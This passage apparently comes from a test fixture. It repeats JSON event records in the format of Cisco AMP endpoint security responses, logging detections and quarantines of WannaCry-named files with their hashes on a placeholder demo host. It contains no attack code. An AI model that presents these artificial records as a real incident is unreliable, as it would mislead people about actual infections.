Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847670","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":776000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":745000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":730000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847667","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":620000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":355000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":308000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2372,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":293000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":277000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":230000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":184000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2372,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":152000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 